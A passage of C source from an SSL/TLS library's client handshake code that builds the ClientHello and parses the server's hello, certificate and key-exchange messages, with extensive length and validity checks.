* 7. Server chokes on RSA encrypted premaster secret
* containing version 1.0.
*
* For interoperability it should be OK to always use the
* maximum version we support in client hello and then rely
* on the checking of version to ensure the server isn't
* being inconsistent: for example initially negotiating with
* TLS 1.0 and renegotiating with TLS 1.2. We do this by using
* client_version in client hello and not resetting it to
* the negotiated version.
*/
#if 0
*(p++)=s->version>>8;
*(p++)=s->version&0xff;
s->client_version=s->version;
#else
*(p++)=s->client_version>>8;
*(p++)=s->client_version&0xff;
#endif
/* Random stuff */
memcpy(p,s->s3->client_random,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/* Session ID */
if (s->new_session)
i=0;
else
i=s->session->session_id_length;
*(p++)=i;
if (i != 0)
{
if (i > (int)sizeof(s->session->session_id))
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
goto err;
}
memcpy(p,s->session->session_id,i);
p+=i;
}
/* cookie stuff for DTLS */
if (SSL_IS_DTLS(s))
{
if ( s->d1->cookie_len > sizeof(s->d1->cookie))
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
goto err;
}
*(p++) = s->d1->cookie_len;
memcpy(p, s->d1->cookie, s->d1->cookie_len);
p += s->d1->cookie_len;
}
/* Ciphers supported */
i=ssl_cipher_list_to_bytes(s,SSL_get_ciphers(s),&(p[2]),0);
if (i == 0)
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO,SSL_R_NO_CIPHERS_AVAILABLE);
goto err;
}
#ifdef OPENSSL_MAX_TLS1_2_CIPHER_LENGTH
/* Some servers hang if client hello > 256 bytes
* as a hack workaround, chop the number of supported ciphers
* to keep it well below this if we use TLS v1.2
*/
if (TLS1_get_version(s) >= TLS1_2_VERSION
&& i > OPENSSL_MAX_TLS1_2_CIPHER_LENGTH)
i = OPENSSL_MAX_TLS1_2_CIPHER_LENGTH & ~1;
#endif
s2n(i,p);
p+=i;
/* COMPRESSION */
#ifdef OPENSSL_NO_COMP
*(p++)=1;
#else
if (!ssl_allow_compression(s) || !s->ctx->comp_methods)
j=0;
else
j=sk_SSL_COMP_num(s->ctx->comp_methods);
*(p++)=1+j;
for (i=0; i<j; i++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,i);
*(p++)=comp->id;
}
#endif
*(p++)=0; /* Add the NULL method */
#ifndef OPENSSL_NO_TLSEXT
/* TLS extensions*/
if (ssl_prepare_clienthello_tlsext(s) <= 0)
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO,SSL_R_CLIENTHELLO_TLSEXT);
goto err;
}
if ((p = ssl_add_clienthello_tlsext(s, p, buf+SSL3_RT_MAX_PLAIN_LENGTH, &al)) == NULL)
{
ssl3_send_alert(s,SSL3_AL_FATAL,al);
SSLerr(SSL_F_SSL3_CLIENT_HELLO,ERR_R_INTERNAL_ERROR);
goto err;
}
#endif
l= p-d;
ssl_set_handshake_header(s, SSL3_MT_CLIENT_HELLO, l);
s->state=SSL3_ST_CW_CLNT_HELLO_B;
}
/* SSL3_ST_CW_CLNT_HELLO_B */
return ssl_do_write(s);
err:
return(-1);
}
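/*
 * process the ServerHello: check the protocol version, read the server
 * random and session id, and make sure the selected cipher and compression
 * method were actually offered in our ClientHello
 */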
int ssl3_get_server_hello(SSL *s)
{
STACK_OF(SSL_CIPHER) *sk;
const SSL_CIPHER *c;
CERT *ct = s->cert;
unsigned char *p,*d;
int i,al=SSL_AD_INTERNAL_ERROR,ok;
unsigned int j;
long n;
#ifndef OPENSSL_NO_COMP
SSL_COMP *comp;
#endif
/* Hello verify request and/or server hello version may not
* match so set first packet if we're negotiating version.
*/
if (SSL_IS_DTLS(s))
s->first_packet = 1;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_SRVR_HELLO_A,
SSL3_ST_CR_SRVR_HELLO_B,
-1,
20000, /* ?? */
&ok);
if (!ok) return((int)n);
if (SSL_IS_DTLS(s))
{
s->first_packet = 0;
if ( s->s3->tmp.message_type == DTLS1_MT_HELLO_VERIFY_REQUEST)
{
if ( s->d1->send_cookie == 0)
{
s->s3->tmp.reuse_message = 1;
return 1;
}
else /* already sent a cookie */
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_BAD_MESSAGE_TYPE);
goto f_err;
}
}
}
if ( s->s3->tmp.message_type != SSL3_MT_SERVER_HELLO)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_BAD_MESSAGE_TYPE);
goto f_err;
}
d=p=(unsigned char *)s->init_msg;
if (s->method->version == DTLS_ANY_VERSION)
{
/* Work out correct protocol version to use */
int hversion = (p[0] << 8)|p[1];
int options = s->options;
if (hversion == DTLS1_2_VERSION
&& !(options & SSL_OP_NO_DTLSv1_2))
s->method = DTLSv1_2_client_method();
else if (tls1_suiteb(s))
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
s->version = hversion;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
else if (hversion == DTLS1_VERSION
&& !(options & SSL_OP_NO_DTLSv1))
s->method = DTLSv1_client_method();
else
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_WRONG_SSL_VERSION);
s->version = hversion;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
s->version = s->method->version;
}
if ((p[0] != (s->version>>8)) || (p[1] != (s->version&0xff)))
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_WRONG_SSL_VERSION);
s->version=(s->version&0xff00)|p[1];
al=SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
p+=2;
/* load the server hello data */
/* load the server random */
memcpy(s->s3->server_random,p,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
s->hit = 0;
/* get the session-id */
j= *(p++);
if ((j > sizeof s->session->session_id) || (j > SSL3_SESSION_ID_SIZE))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_SSL3_SESSION_ID_TOO_LONG);
goto f_err;
}
#ifndef OPENSSL_NO_TLSEXT
/* check if we want to resume the session based on external pre-shared secret */
if (s->version >= TLS1_VERSION && s->tls_session_secret_cb)
{
SSL_CIPHER *pref_cipher=NULL;
s->session->master_key_length=sizeof(s->session->master_key);
if (s->tls_session_secret_cb(s, s->session->master_key,
&s->session->master_key_length,
NULL, &pref_cipher,
s->tls_session_secret_cb_arg))
{
s->session->cipher = pref_cipher ?
pref_cipher : ssl_get_cipher_by_char(s, p+j);
s->hit = 1;
}
}
#endif /* OPENSSL_NO_TLSEXT */
if (!s->hit && j != 0 && j == s->session->session_id_length
&& memcmp(p,s->session->session_id,j) == 0)
{
if(s->sid_ctx_length != s->session->sid_ctx_length
|| memcmp(s->session->sid_ctx,s->sid_ctx,s->sid_ctx_length))
{
/* actually a client application bug */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_ATTEMPT_TO_REUSE_SESSION_IN_DIFFERENT_CONTEXT);
goto f_err;
}
s->hit=1;
}
/* a miss or crap from the other end */
if (!s->hit)
{
/* If we were trying for session-id reuse, make a new
* SSL_SESSION so we don't stuff up other people */
if (s->session->session_id_length > 0)
{
if (!ssl_get_new_session(s,0))
{
goto f_err;
}
}
s->session->session_id_length=j;
memcpy(s->session->session_id,p,j); /* j could be 0 */
}
p+=j;
c=ssl_get_cipher_by_char(s,p);
if (c == NULL)
{
/* unknown cipher */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_UNKNOWN_CIPHER_RETURNED);
goto f_err;
}
/* Set version disabled mask now we know version */
if (!SSL_USE_TLS1_2_CIPHERS(s))
ct->mask_ssl = SSL_TLSV1_2;
else
ct->mask_ssl = 0;
/* If it is a disabled cipher we didn't send it in client hello,
* so return an error.
*/
if (ssl_cipher_disabled(s, c, SSL_SECOP_CIPHER_CHECK))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_WRONG_CIPHER_RETURNED);
goto f_err;
}
p+=ssl_put_cipher_by_char(s,NULL,NULL);
sk=ssl_get_ciphers_by_id(s);
i=sk_SSL_CIPHER_find(sk,c);
if (i < 0)
{
/* we did not say we would use this cipher */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_WRONG_CIPHER_RETURNED);
goto f_err;
}
/* Depending on the session caching (internal/external), the cipher
and/or cipher_id values may not be set. Make sure that
cipher_id is set and use it for comparison. */
if (s->session->cipher)
s->session->cipher_id = s->session->cipher->id;
if (s->hit && (s->session->cipher_id != c->id))
{
/* Workaround is now obsolete */
#if 0
if (!(s->options &
SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG))
#endif
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_OLD_SESSION_CIPHER_NOT_RETURNED);
goto f_err;
}
}
s->s3->tmp.new_cipher=c;
/* Don't digest cached records if no sigalgs: we may need them for
* client authentication.
*/
if (!SSL_USE_SIGALGS(s) && !ssl3_digest_cached_records(s))
goto f_err;
/* lets get the compression algorithm */
/* COMPRESSION */
#ifdef OPENSSL_NO_COMP
if (*(p++) != 0)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
goto f_err;
}
/* If compression is disabled we'd better not try to resume a session
* using compression.
*/
if (s->session->compress_meth != 0)
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
#else
j= *(p++);
if (s->hit && j != s->session->compress_meth)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_OLD_SESSION_COMPRESSION_ALGORITHM_NOT_RETURNED);
goto f_err;
}
if (j == 0)
comp=NULL;
else if (!ssl_allow_compression(s))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_COMPRESSION_DISABLED);
goto f_err;
}
else
comp=ssl3_comp_find(s->ctx->comp_methods,j);
if ((j != 0) && (comp == NULL))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
goto f_err;
}
else
{
s->s3->tmp.new_compression=comp;
}
#endif
#ifndef OPENSSL_NO_TLSEXT
/* TLS extensions*/
if (!ssl_parse_serverhello_tlsext(s,&p,d,n))
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_PARSE_TLSEXT);
goto err;
}
#endif
if (p != (d+n))
{
/* wrong packet length */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_BAD_PACKET_LENGTH);
goto f_err;
}
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
return(-1);
}
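/*
 * read and parse the server's Certificate message, verify the chain and
 * stash the peer certificate and public key in the session's sess_cert
 */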
int ssl3_get_server_certificate(SSL *s)
{
int al,i,ok,ret= -1;
unsigned long n,nc,llen,l;
X509 *x=NULL;
const unsigned char *q,*p;
unsigned char *d;
STACK_OF(X509) *sk=NULL;
SESS_CERT *sc;
EVP_PKEY *pkey=NULL;
int need_cert = 1; /* VRS: 0=> will allow null cert if auth == KRB5 */
n=s->method->ssl_get_message(s,
SSL3_ST_CR_CERT_A,
SSL3_ST_CR_CERT_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
if ((s->s3->tmp.message_type == SSL3_MT_SERVER_KEY_EXCHANGE) ||
((s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5) &&
(s->s3->tmp.message_type == SSL3_MT_SERVER_DONE)))
{
s->s3->tmp.reuse_message=1;
return(1);
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_BAD_MESSAGE_TYPE);
goto f_err;
}
p=d=(unsigned char *)s->init_msg;
if ((sk=sk_X509_new_null()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
n2l3(p,llen);
if (llen+3 != n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
for (nc=0; nc<llen; )
{
n2l3(p,l);
if ((l+nc+3) > llen)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
q=p;
x=d2i_X509(NULL,&q,l);
if (x == NULL)
{
al=SSL_AD_BAD_CERTIFICATE;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,ERR_R_ASN1_LIB);
goto f_err;
}
if (q != (p+l))
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
if (!sk_X509_push(sk,x))
{
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
x=NULL;
nc+=l+3;
p=q;
}
i=ssl_verify_cert_chain(s,sk);
if ((s->verify_mode != SSL_VERIFY_NONE) && (i <= 0)
#ifndef OPENSSL_NO_KRB5
&& !((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5) &&
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5))
#endif /* OPENSSL_NO_KRB5 */
)
{
al=ssl_verify_alarm_type(s->verify_result);
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_CERTIFICATE_VERIFY_FAILED);
goto f_err;
}
ERR_clear_error(); /* but we keep s->verify_result */
if (i > 1)
{
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE, i);
al = SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
sc=ssl_sess_cert_new();
if (sc == NULL) goto err;
if (s->session->sess_cert) ssl_sess_cert_free(s->session->sess_cert);
s->session->sess_cert=sc;
sc->cert_chain=sk;
/* Inconsistency alert: cert_chain does include the peer's
* certificate, which we don't include in s3_srvr.c */
x=sk_X509_value(sk,0);
sk=NULL;
/* VRS 19990621: possible memory leak; sk=null ==> !sk_pop_free() @end*/
pkey=X509_get_pubkey(x);
/* VRS: allow null cert if auth == KRB5 */
need_cert = ((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5) &&
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5))
? 0 : 1;
#ifdef KSSL_DEBUG
fprintf(stderr,"pkey,x = %p, %p\n", pkey,x);
fprintf(stderr,"ssl_cert_type(x,pkey) = %d\n", ssl_cert_type(x,pkey));
fprintf(stderr,"cipher, alg, nc = %s, %lx, %lx, %d\n", s->s3->tmp.new_cipher->name,
s->s3->tmp.new_cipher->algorithm_mkey, s->s3->tmp.new_cipher->algorithm_auth, need_cert);
#endif /* KSSL_DEBUG */
if (need_cert && ((pkey == NULL) || EVP_PKEY_missing_parameters(pkey)))
{
x=NULL;
al=SSL3_AL_FATAL;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
SSL_R_UNABLE_TO_FIND_PUBLIC_KEY_PARAMETERS);
goto f_err;
}
i=ssl_cert_type(x,pkey);
if (need_cert && i < 0)
{
x=NULL;
al=SSL3_AL_FATAL;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
SSL_R_UNKNOWN_CERTIFICATE_TYPE);
goto f_err;
}
if (need_cert)
{
int exp_idx = ssl_cipher_get_cert_index(s->s3->tmp.new_cipher);
if (exp_idx >= 0 && i != exp_idx)
{
x=NULL;
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
SSL_R_WRONG_CERTIFICATE_TYPE);
goto f_err;
}
sc->peer_cert_type=i;
CRYPTO_add(&x->references,1,CRYPTO_LOCK_X509);
/* Why would the following ever happen?
* We just created sc a couple of lines ago. */
if (sc->peer_pkeys[i].x509 != NULL)
X509_free(sc->peer_pkeys[i].x509);
sc->peer_pkeys[i].x509=x;
sc->peer_key= &(sc->peer_pkeys[i]);
if (s->session->peer != NULL)
X509_free(s->session->peer);
CRYPTO_add(&x->references,1,CRYPTO_LOCK_X509);
s->session->peer=x;
}
else
{
sc->peer_cert_type=i;
sc->peer_key= NULL;
if (s->session->peer != NULL)
X509_free(s->session->peer);
s->session->peer=NULL;
}
s->session->verify_result = s->verify_result;
x=NULL;
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
EVP_PKEY_free(pkey);
X509_free(x);
sk_X509_pop_free(sk,X509_free);
return(ret);
}
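/*
 * parse the ServerKeyExchange message for the negotiated key exchange
 * (PSK hint, SRP, ephemeral RSA, DHE or ECDHE parameters) and, unless the
 * ciphersuite is anonymous, verify the server's signature over them
 */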
int ssl3_get_key_exchange(SSL *s)
{
#ifndef OPENSSL_NO_RSA
unsigned char *q,md_buf[EVP_MAX_MD_SIZE*2];
#endif
EVP_MD_CTX md_ctx;
unsigned char *param,*p;
int al,j,ok;
long i,param_len,n,alg_k,alg_a;
EVP_PKEY *pkey=NULL;
const EVP_MD *md = NULL;
#ifndef OPENSSL_NO_RSA
RSA *rsa=NULL;
#endif
#ifndef OPENSSL_NO_DH
DH *dh=NULL;
#endif
#ifndef OPENSSL_NO_ECDH
EC_KEY *ecdh = NULL;
BN_CTX *bn_ctx = NULL;
EC_POINT *srvr_ecpoint = NULL;
int curve_nid = 0;
int encoded_pt_len = 0;
#endif
/* use the same message size as in ssl3_get_certificate_request()
* as the ServerKeyExchange message may be skipped */
n=s->method->ssl_get_message(s,
SSL3_ST_CR_KEY_EXCH_A,
SSL3_ST_CR_KEY_EXCH_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
if (s->s3->tmp.message_type != SSL3_MT_SERVER_KEY_EXCHANGE)
{
#ifndef OPENSSL_NO_PSK
/* In plain PSK ciphersuite, ServerKeyExchange can be
omitted if no identity hint is sent. Set
session->sess_cert anyway to avoid problems
later.*/
if (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)
{
s->session->sess_cert=ssl_sess_cert_new();
if (s->ctx->psk_identity_hint)
OPENSSL_free(s->ctx->psk_identity_hint);
s->ctx->psk_identity_hint = NULL;
}
#endif
s->s3->tmp.reuse_message=1;
return(1);
}
param=p=(unsigned char *)s->init_msg;
if (s->session->sess_cert != NULL)
{
#ifndef OPENSSL_NO_RSA
if (s->session->sess_cert->peer_rsa_tmp != NULL)
{
RSA_free(s->session->sess_cert->peer_rsa_tmp);
s->session->sess_cert->peer_rsa_tmp=NULL;
}
#endif
#ifndef OPENSSL_NO_DH
if (s->session->sess_cert->peer_dh_tmp)
{
DH_free(s->session->sess_cert->peer_dh_tmp);
s->session->sess_cert->peer_dh_tmp=NULL;
}
#endif
#ifndef OPENSSL_NO_ECDH
if (s->session->sess_cert->peer_ecdh_tmp)
{
EC_KEY_free(s->session->sess_cert->peer_ecdh_tmp);
s->session->sess_cert->peer_ecdh_tmp=NULL;
}
#endif
}
else
{
s->session->sess_cert=ssl_sess_cert_new();
}
/* Total length of the parameters including the length prefix */
param_len=0;
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
alg_a=s->s3->tmp.new_cipher->algorithm_auth;
EVP_MD_CTX_init(&md_ctx);
al=SSL_AD_DECODE_ERROR;
#ifndef OPENSSL_NO_PSK
if (alg_k & SSL_kPSK)
{
char tmp_id_hint[PSK_MAX_IDENTITY_LEN+1];
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
/* Store PSK identity hint for later use, hint is used
* in ssl3_send_client_key_exchange. Assume that the
* maximum length of a PSK identity hint can be as
* long as the maximum length of a PSK identity. */
if (i > PSK_MAX_IDENTITY_LEN)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto f_err;
}
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_BAD_PSK_IDENTITY_HINT_LENGTH);
goto f_err;
}
param_len += i;
/* If received PSK identity hint contains NULL
* characters, the hint is truncated from the first
* NULL. p may not end with a NULL, so create a
* NULL-terminated string. */
memcpy(tmp_id_hint, p, i);
memset(tmp_id_hint+i, 0, PSK_MAX_IDENTITY_LEN+1-i);
if (s->ctx->psk_identity_hint != NULL)
OPENSSL_free(s->ctx->psk_identity_hint);
s->ctx->psk_identity_hint = BUF_strdup(tmp_id_hint);
if (s->ctx->psk_identity_hint == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
goto f_err;
}
p+=i;
n-=param_len;
}
else
#endif /* !OPENSSL_NO_PSK */
#ifndef OPENSSL_NO_SRP
if (alg_k & SSL_kSRP)
{
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_N_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.N=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_G_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.g=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (1 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 1;
i = (unsigned int)(p[0]);
p++;
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_S_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.s=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_B_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.B=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
if (!srp_verify_server_param(s, &al))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_PARAMETERS);
goto f_err;
}
/* We must check if there is a certificate */
#ifndef OPENSSL_NO_RSA
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#else
if (0)
;
#endif
#ifndef OPENSSL_NO_DSA
else if (alg_a & SSL_aDSS)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].x509);
#endif
}
else
#endif /* !OPENSSL_NO_SRP */
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
if ((rsa=RSA_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_MODULUS_LENGTH);
goto f_err;
}
param_len += i;
if (!(rsa->n=BN_bin2bn(p,i,rsa->n)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_E_LENGTH);
goto f_err;
}
param_len += i;
if (!(rsa->e=BN_bin2bn(p,i,rsa->e)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
/* this should be because we are using an export cipher */
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
else
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
s->session->sess_cert->peer_rsa_tmp=rsa;
rsa=NULL;
}
#else /* OPENSSL_NO_RSA */
if (0)
;
#endif
#ifndef OPENSSL_NO_DH
else if (alg_k & SSL_kDHE)
{
if ((dh=DH_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_P_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->p=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_G_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->g=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_PUB_KEY_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->pub_key=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
if (!ssl_security(s, SSL_SECOP_TMP_DH,
DH_security_bits(dh), 0, dh))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_DH_KEY_TOO_SMALL);
goto f_err;
}
#ifndef OPENSSL_NO_RSA
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#else
if (0)
;
#endif
#ifndef OPENSSL_NO_DSA
else if (alg_a & SSL_aDSS)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].x509);
#endif
/* else anonymous DH, so no certificate or pkey. */
s->session->sess_cert->peer_dh_tmp=dh;
dh=NULL;
}
else if ((alg_k & SSL_kDHr) || (alg_k & SSL_kDHd))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_TRIED_TO_USE_UNSUPPORTED_CIPHER);
goto f_err;
}
#endif /* !OPENSSL_NO_DH */
#ifndef OPENSSL_NO_ECDH
else if (alg_k & SSL_kECDHE)
{
EC_GROUP *ngroup;
const EC_GROUP *group;
if ((ecdh=EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
/* Extract elliptic curve parameters and the
* server's ephemeral ECDH public key.
